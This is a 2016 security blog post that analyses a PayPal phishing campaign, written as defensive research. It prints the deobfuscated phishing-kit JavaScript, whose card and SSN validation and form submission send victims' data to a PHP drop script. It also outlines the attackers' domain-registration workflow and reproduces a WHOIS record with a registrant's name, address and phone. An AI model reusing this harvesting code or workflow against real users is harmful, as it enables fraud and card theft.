Monday, July 25, 2016

SPAM / SCAM campaign to steal Credit Card Details (I)

Over the last few weeks I have looked at several SPAM / SCAM campaigns targeting end users and businesses. In some cases the intention was to fool users into handing over their credit card details, but that was not always the case.

Cyber criminals mimic any kind of business using multiple tricks: for example, fake invoices from Amazon, security warning messages from PayPal or eBay, or customer service messages from banks across the world.

In this case I'm going to talk about one interesting campaign currently happening against PayPal.

Initially a SCAM email like the one below is sent to the victim. The email has an HTML file attached. If the end user is lucky the email is detected as SPAM by the mail filters, but this has not always been the case. In none of the cases was the HTML detected as malicious by the AV; the HTML used in this post, which I have uploaded to VirusTotal, is detected by only 3 engines.

Once opened in any browser, the HTML file shows a form requesting several pieces of information, including credit card details.

Looking at the HTML source, I see obfuscated JavaScript code. All of it sits on a single line.

With the help of the js-beautify tool installed in REMnux, the JavaScript code is 'cleaned', which makes it possible to do some debugging.

Using the Firebug JavaScript debugger, I can step through the code. There are several functions that manipulate the data embedded in the HTML code.

Using some breakpoints I can extract the content of the variable BkozdlkPhvQy, which contains the final HTML that will be presented to the victim.

This new HTML code can be extracted for further analysis.

Again, with the help of Firebug I can run the JavaScript code step by step.

There are several functions in the code which look interesting. Moreover, I find references to some URLs and to a PHP script, 9d681cd81c49939eb384d49051d7e272.php.

<script type="text/javascript" language="javascript">
    // Name of the PHP drop script, appended to the exfiltration URL on submit
    var _0x297b9e = "9d681cd81c49939eb384d49051d7e272.php";
    // Luhn check: walks the digits right to left and adds every second digit
    // through the lookup table [0,2,4,6,8,1,3,5,7,9] (the digit sum of 2*n)
    var _0x3a657d = (function(a) {
        return function(f) {
            var b = f.length,
                e = 1,
                c = 0,
                d;
            while (b) {
                d = parseInt(f.charAt(--b), 10);
                c += (e ^= 1) ? a[d] : d
            }
            return c && c % 10 === 0
        }
    }([0, 2, 4, 6, 8, 1, 3, 5, 7, 9]));
    // URL prefix the PHP script name gets appended to (shown empty here)
    var _0x78eb7f = "";
    var _0x68bfad = 0;

    // Called on submit: only points the form at the drop script if the
    // validation below passes
    function PSubmit() {
        if (!_0x529953()) {
            return false;
        }
        if (!_0x68bfad) _0x78eb7f += _0x297b9e;
        document.forms["env"].action = _0x78eb7f;
        document.forms["env"].method = "post";
    }

    // Field validation: every failure redirects the victim away (the target
    // URL is not shown in this excerpt) and returns false
    function _0x529953() {
        ax = _0x3a657d(document.env.MBcnum.value);
        if (!ax) return window.location.replace(""), !1;
        var a = document.env.MBaddr.value,
            c = document.env.MBem.value,
            b = document.env.MBey.value,
            d = document.env.MBcv.value;
        if (!document.env.MBfn.value || !a || !d || "00" == c || "00" == b) return window.location.replace(""), !1;
        a = document.env.MBssn.value;
        c = a.length;
        b = 9; - 1 != a.indexOf("-") && (b += 2);
        if ("United States" == document.env.MBctn.value) {
            if (0 < c && c != b) return window.location.replace(""), !1;
            a = document.env.MBzip.value.length;
            if (0 < a && 5 != a) return window.location.replace(""), !1
        }
        return !0
    }
</script>


The first function, assigned to var _0x3a657d, checks whether the credit card number entered is a valid one. It is a Luhn check: the digits are walked from right to left, every second digit is doubled via the lookup table [0, 2, 4, 6, 8, 1, 3, 5, 7, 9] (the digit sum of 2*n), and the total must be non-zero and a multiple of 10. If it is not, the browser is redirected to

The second function, PSubmit(), is in charge of sending the data through a POST request: it sets the form's method to POST and builds the action URL by appending the PHP script name. All the data will be sent to the URL

The last function, _0x529953(), performs additional checks:

  • that the address filled in the form is not empty
  • that the expiry month and year are not "00" and the CVV is not empty
  • that the name filled in is not empty
  • if the country selected is United States, that the SSN (when given) is 9 characters long, or 11 with dashes, and that the ZIP code (when given) is exactly 5 characters long

If any of these checks fails, the browser is redirected to
Otherwise, the data filled in the form is sent to
Below is an example of the HTTP POST.

This is quite interesting: the criminals are making sure they only receive valid data through the form, so they do not need to validate the data received on the server side.
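To see exactly which submissions the kit forwards, here is a DOM-free re-implementation of the two validation routines above. It is an added example written for this post, not code from the kit: the names luhnValid, kitAccepts, classify and the fields of the sample object are mine, the logic mirrors _0x3a657d and _0x529953 check for check, and the card number used is the widely published 4111 1111 1111 1111 test number, not a real card.

```javascript
// Lookup table the kit uses: DOUBLED[n] is the digit sum of 2*n, i.e. the
// Luhn "double every second digit" step done by table lookup.
const DOUBLED = [0, 2, 4, 6, 8, 1, 3, 5, 7, 9];

// Mirrors _0x3a657d: walk the string right to left, add odd positions as they
// are and even positions through the table. A non-digit (space, dash) makes
// parseInt return NaN, the running sum becomes NaN and the result is falsy,
// exactly as in the kit.
function luhnValid(number) {
  let sum = 0;
  let doubleIt = false;
  for (let i = number.length - 1; i >= 0; i--) {
    const d = parseInt(number.charAt(i), 10);
    sum += doubleIt ? DOUBLED[d] : d;
    doubleIt = !doubleIt;
  }
  return Boolean(sum) && sum % 10 === 0;
}

// Mirrors _0x529953 over a plain object instead of document.env.* fields
// (field names are mine). true means the submission would be POSTed to the
// drop script; false means the victim would be bounced to the redirect URL.
function kitAccepts(f) {
  if (!luhnValid(f.cardNumber)) return false;
  if (!f.fullName || !f.address || !f.cvv) return false;
  if (f.expMonth === "00" || f.expYear === "00") return false;
  if (f.country === "United States") {
    // SSN is optional, but if present must be 9 chars, or 11 with dashes
    const wantSsn = f.ssn.indexOf("-") !== -1 ? 11 : 9;
    if (f.ssn.length > 0 && f.ssn.length !== wantSsn) return false;
    // ZIP is optional, but if present must be exactly 5 characters
    if (f.zip.length > 0 && f.zip.length !== 5) return false;
  }
  return true;
}

// Constructed sample submission (not real data): the standard 4111 1111 1111
// 1111 test number, which is Luhn-valid, with the remaining fields filled in.
const SAMPLE = {
  fullName: "J. Doe", address: "1 Main St", cardNumber: "4111111111111111",
  expMonth: "07", expYear: "19", cvv: "123",
  country: "United States", ssn: "", zip: "90210",
};

// Classify a batch of submissions the way the kit would.
function classify(submissions) {
  return submissions.map((s) => (kitAccepts(s) ? "forwarded" : "bounced"));
}

console.log(classify([
  SAMPLE,
  { ...SAMPLE, cardNumber: "4111111111111112" }, // bad check digit
  { ...SAMPLE, zip: "9021" },                    // 4-char ZIP with US selected
  { ...SAMPLE, country: "Canada", zip: "ABC" },  // ZIP rule only applies to US
]));
```

Anything that comes back as "bounced" never reaches the criminals' server, which is why any attempt to flood the drop with junk has to use Luhn-valid numbers and non-empty name, address and CVV fields to get through.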

After the data is sent through the POST, the PHP script redirects to

As a test, I can request the resource manually, directly by IP, and I am redirected to PayPal as well.

Checking the domain's WHOIS record, I can see it was created the day before the email was sent.

Whois Server Version 2.0


   Domain Name: CANDIDATE7.COM
   Sponsoring Registrar IANA ID: 303
   Whois Server:
   Referral URL:
   Name Server: NS1.DYNU.COM
   Name Server: NS2.DYNU.COM
   Name Server: NS3.DYNU.COM
   Name Server: NS4.DYNU.COM
   Name Server: NS5.DYNU.COM
   Status: clientTransferProhibited
   Updated Date: 22-jul-2016
   Creation Date: 20-jul-2016
   Expiration Date: 20-jul-2017

>>> Last update of whois database: Sun, 24 Jul 2016 08:47:13 GMT <<<

Registry Domain ID: 2044541489_DOMAIN_COM-VRSN
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2016-07-20T01:43:14Z
Creation Date: 2016-07-20T01:43:12Z
Registrar Registration Expiration Date: 2017-07-20T01:43:12Z
Registrar: PDR Ltd. d/b/a
Registrar IANA ID: 303
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: Alex Tankredi
Registrant Organization: N/A
Registrant Street: 289 rendang rd no 28b
Registrant City: kuala lumpur
Registrant State/Province: kl
Registrant Postal Code: 248195
Registrant Country: MY
Registrant Phone: +60.601848928124
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:
Registry Admin ID:
Admin Name: Alex Tankredi
Admin Organization: N/A
Admin Street: 289 rendang rd no 28b
Admin City: kuala lumpur
Admin State/Province: kl
Admin Postal Code: 248195
Admin Country: MY
Admin Phone: +60.601848928124
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email:
Registry Tech ID:
Tech Name: Alex Tankredi
Tech Organization: N/A
Tech Street: 289 rendang rd no 28b
Tech City: kuala lumpur
Tech State/Province: kl
Tech Postal Code: 248195
Tech Country: MY
Tech Phone: +60.601848928124
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email:
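The domain age observation above can be turned into an automated triage check. The following is an added example written for this post, not code from the original: it parses the two date formats that appear in the record (the thin-registry 20-jul-2016 form and the registrar's ISO-8601 form), keeps the first value for repeated keys, and reports how many days old the domain was at a given timestamp. The embedded record is an excerpt of the output shown above, the function names are mine, and the 30-day threshold is an arbitrary choice.

```javascript
// Month abbreviations used by the legacy "20-jul-2016" WHOIS date format.
const MONTHS = { jan: 0, feb: 1, mar: 2, apr: 3, may: 4, jun: 5,
                 jul: 6, aug: 7, sep: 8, oct: 9, nov: 10, dec: 11 };

// Accepts either "20-jul-2016" (thin registry section) or ISO-8601
// "2016-07-20T01:43:12Z" (registrar section). Returns a Date or null.
function parseWhoisDate(text) {
  const legacy = /^(\d{1,2})-([a-z]{3})-(\d{4})$/i.exec(text.trim());
  if (legacy) {
    const mon = MONTHS[legacy[2].toLowerCase()];
    if (mon === undefined) return null;
    return new Date(Date.UTC(+legacy[3], mon, +legacy[1]));
  }
  const d = new Date(text.trim());
  return isNaN(d.getTime()) ? null : d;
}

// Pull "Key: value" fields out of a WHOIS dump. Keys are lower-cased; repeated
// keys keep the first value (the thin-registry section comes first). Lines
// such as ">>> Last update ... <<<" have no leading key and are skipped.
function parseWhois(dump) {
  const fields = {};
  for (const line of dump.split("\n")) {
    const m = /^\s*([A-Za-z][A-Za-z /]*?):\s*(.*)$/.exec(line);
    if (!m) continue;
    const key = m[1].trim().toLowerCase();
    if (!(key in fields)) fields[key] = m[2].trim();
  }
  return fields;
}

// Whole days between domain creation and the time the message was seen,
// or null when no usable creation date is present.
function domainAgeDays(dump, seenAt) {
  const created = parseWhoisDate(parseWhois(dump)["creation date"] || "");
  if (!created) return null;
  return Math.floor((seenAt.getTime() - created.getTime()) / 86400000);
}

// Flag domains younger than maxDays (default 30, an arbitrary threshold).
function isYoungDomain(dump, seenAt, maxDays = 30) {
  const age = domainAgeDays(dump, seenAt);
  return age !== null && age < maxDays;
}

// Excerpt of the WHOIS output shown above (thin registry part first).
const RECORD = `   Domain Name: CANDIDATE7.COM
   Name Server: NS1.DYNU.COM
   Status: clientTransferProhibited
   Updated Date: 22-jul-2016
   Creation Date: 20-jul-2016
   Expiration Date: 20-jul-2017

>>> Last update of whois database: Sun, 24 Jul 2016 08:47:13 GMT <<<

Registry Domain ID: 2044541489_DOMAIN_COM-VRSN
Creation Date: 2016-07-20T01:43:12Z
Registrar: PDR Ltd. d/b/a
`;

// Use the WHOIS query time from the record as the "seen" timestamp.
const SEEN = new Date("2016-07-24T08:47:13Z");
console.log("age in days:", domainAgeDays(RECORD, SEEN),
            "young:", isYoungDomain(RECORD, SEEN));
```

Registration date alone is a weak signal (plenty of legitimate domains are new), but combined with a brand-impersonating form and a sender that does not match the brand it is a cheap first-pass filter for mail triage.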

Several other domains have been registered under the same e-mail address.

The domains used for this campaign, and resolve to the same IP
All three of them were registered around the same time. Incidentally, the IP is a Tor node.

All the subdomains, and also resolve to the same IP, which is the one the threat actors are using to receive the data from the form.

This is what happens, in essence:
  • The threat actors register several domains around the same time, all under the same registrant name and resolving to the same IP.
  • Very shortly after the domains are registered, the SCAM emails are sent with the HTML attached. The HTML is obfuscated to evade detection.
  • The HTML contains an HTTP form to steal credit card data. The form only sends the data to the threat actors if the information passes the client-side checks, so obviously fake input never reaches them.
  • After the POST request, the user is redirected to the real PayPal website.
Once the domains are blacklisted, they register new domains and start again from step 1.


(More to come)